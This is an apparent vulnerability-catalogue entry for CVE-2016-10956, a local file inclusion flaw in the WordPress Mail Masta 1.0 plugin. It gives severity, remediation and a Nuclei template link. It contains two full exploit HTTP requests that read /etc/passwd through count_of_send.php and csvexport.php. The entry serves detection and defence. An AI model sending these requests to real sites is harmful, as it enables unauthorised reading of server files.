| Title | WordPress Mail Masta 1.0 - Local File Inclusion |
|---|---|
| Author | daffainfo,0x240x23elu |
| Severity | High |
| Impact | An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. |
| Remediation | Update WordPress Mail Masta to the latest version or apply the vendor-supplied patch to fix the local file inclusion vulnerability. |
| CVSS Score | 7.5 |
| EPSS Score | 0.89171 |
| CVE ID | CVE-2016-10956 |
| CWE ID | CWE-20 |
| Tags | cve cve2016 wordpress wp-plugin lfi mail mail-masta_project vuln |
WordPress Mail Masta 1.0 is susceptible to local file inclusion in count_of_send.php and csvexport.php.
GET /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2016/CVE-2016-10956.yaml
🦈 Packet Capture: ⬇️ Download cve-2016-10956.pcap
N/AN/A